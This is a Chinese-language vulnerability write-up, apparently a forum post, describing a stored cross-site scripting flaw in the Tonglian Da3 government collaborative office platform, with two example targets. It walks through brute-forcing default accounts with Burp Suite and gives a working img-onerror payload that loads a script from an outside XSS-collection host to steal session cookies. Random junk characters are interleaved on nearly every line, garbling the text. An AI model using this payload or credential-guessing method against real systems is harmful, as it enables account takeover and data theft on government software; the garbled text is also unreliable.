; g& q) V: r! K
; S v; G; l/ Y8 z( u 同联Da3协同办公平台后台通用储存型xss漏洞
& j* {. V" b5 u3 Z) P7 ~" v
1 L6 @+ x$ h' w! x7 G
- Q, R" ^; S* b, c 平台简介:
0 H- T3 _( C5 U, F
0 M+ B) j3 g! F% x, z
. Y: k" {0 e- R
' Q; w3 p0 W1 d
" n; T; u4 }3 _. l
8 V3 w3 o* j, r7 d |' R 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& O$ t; h3 G% V) g
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
; w- N. K) W2 X7 n( b* P7 t [- d5 ^同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!/ {8 m9 N0 R# {+ Q' y
/ }/ d$ }- ~/ I0 Q
7 w3 f; H; @, B( ^: O* C; U/ f8 d
& i; |7 o* |" C1 B
5 w+ p8 y# r: s 2 g7 s) [6 W* d
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:: e8 c5 X( [+ Q3 \8 N
+ l( N) D! j# l+ x$ S' d$ F
0 P9 L! b. V# {5 ~( c2 ] 5 I! R: T" ~- y9 y7 H$ P! w
( Z; X1 W2 M. B6 l" p8 w" U. Y7 @ $ L4 |4 R A# R& V% z, k
http://1.1.1.1:7197/cap-aco/#(案例2-); G5 p, _8 U u( V4 K
3 I/ K4 g3 ^+ k
; b% ]2 N3 d' Z o& a% _ http://www.XXOO.com (案例1-官网网站); o' ?. U5 s( n# z
) @# O7 s' {* n6 x; Y3 p
9 ?) Y; p! p; B- c
漏洞详情:5 ^7 _0 j1 B0 U9 J
7 ?$ ]4 O( k5 C7 J* m( f
& [! O1 ?9 v4 { ` 案例一、. p, I! |. I! R$ X1 M, a
: v1 U* C. ]+ a$ M
x0 L. I ]; Z) X+ B7 A; x
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试1 r! ]" O' G+ o1 `1 P1 g8 x
6 o! i1 r% I: W$ o( j# `) t
4 A! I- N$ ^: t* s4 S
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:5 l* U, Y' o6 W7 s% }# d' G
/ C H/ {% {9 l& s
U& e1 r6 F3 v0 [2 G8 g - n' R) I @. Q/ i- [* B
: G1 S' Y6 b( f( G+ `: V
8 q8 m# p/ q9 H. r- x: W 
) U4 P: w7 b6 ^
1 v' M1 f0 O Z+ y' p$ P; l2 j
7 |! t7 R! c0 Z" v% p- K$ U; @8 g
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
+ Z8 _/ {! ?0 o
* ^; Y2 d8 m" d! z 3 u2 t) Q$ p; M* ~/ W/ Q
; Q& g; b+ U$ d& m0 j
) r8 @/ @9 G* Y0 R6 y8 W
4 |) X/ [+ u: ~! S
& W- K( D: U, m5 \* ^9 V2 r
?$ }& M4 [4 U
1 O8 k, _9 w" e& M9 ~7 N0 k5 i 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
+ ^( b1 K6 v7 G& k3 \
, T. b/ K$ t+ G5 c+ {' W
0 e$ g3 Z' [; w4 K
: e: F9 z0 Q$ u+ N
& D# p2 e; Z M5 z2 h$ g h! `, K# [) J" W8 i
<img src=x& ]! V! G% ~$ {: ?
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: ; E' M# b t6 h" P
( f2 C. _$ |6 L! C3 \9 _& s+ g$ J
2 ]- R+ U6 J# g* F% o 
* a( x5 E4 a; \! w3 x4 ?) O
4 w& |. y! V2 ]4 x G4 s
3 r) \; h8 |; U
然后发送,接收cookie如图:
) S1 _ @2 V/ Q& h- `+ N6 \$ O
% O+ d' j; B6 k! M# Z7 {
! b+ O" X! s/ H, O+ x( s+ F
7 [! E% s3 ]8 `9 o+ q2 J( a
6 R9 c Q% r* \: L) N
[# v+ P& g+ Y5 W3 \: l9 g# j $ i8 W0 x" @ ?! Y1 [
" G) |0 Q8 @* D o: L. } : x O- p; s/ _. n. h
4 `/ M- M! G+ e D
- r$ \. O' W3 z# x 2 E1 g$ {) w6 l5 d! l
$ o9 h$ {# a2 K" C$ b0 C
+ w; k, x+ ~2 i: d: s0 N
$ |; K f- r) L$ u, N 
( ]9 I6 l: A& A8 \: g
! d6 ?. t0 p% C- L4 ?8 T
( I! i/ T& j2 m7 b 
7 b; Q5 q6 s0 d1 L( J8 \; c
: x; O+ f* a; [' N8 `( |
' h: D, ^$ d% w' H, A5 ?5 l( D" s3 ] o( [% H& I3 @5 t6 N
! ~2 c% g' s3 ]% u, j3 K
, J0 i8 X$ @4 Q( e/ |' { 案例2、 * {+ w9 d3 C: r6 v8 n
: d& Z& Z: i! h
- @" l* N/ J w3 y3 a2 C3 t$ O p 前面步骤都一样,下面看效果图:
3 H0 @$ r! q4 Z5 n$ }( G" H) q* t
* m2 r& i3 }2 e) h
. N F0 R2 m9 L. @ 
, k7 i& ?" p! n: g9 o9 A2 T
9 g/ O# y8 @1 o& l3 r% l% I, y
T3 O9 {7 i2 {( G 
* T4 ]/ {! n3 K, ^. D
6 i. D) C2 f) C" z- w# A( Q+ { & z$ \3 _! x4 R
2 L! V+ L' {8 O
) l& q3 s3 [# z$ u4 D1 B + b% l' [; d1 P& ~, W
0 }: t/ W5 |: E9 |* T0 A9 X
9 d0 H0 V' y2 S5 }7 K* b2 T 4 |/ q5 q$ d+ l% G& x2 o$ ^. z
3 s$ Y* z' E' m: h; I' n
. g [+ ?( y8 u$ z% t! I7 p4 D
! S6 x$ R( U) m
3 i8 B7 x% V" o5 R: [9 B
~! r2 Y7 a1 j/ c0 l) ? h5 x
- V) c- j3 ]+ C5 w, L1 d0 Z: t: O7 i 6 O. e; V s |8 T S" B
! _! F* E3 G$ y4 |/ q$ U( l4 S
8 n* K/ x* J( j) R ! u/ Q$ l& T( p% O) X5 E$ t
& z- t& T- Q2 N( J/ O9 J) y
" {( W7 o' z/ x
. t G7 b# `* R: V2 S( a; B! v5 S% L6 G
. E% p3 K" J% r D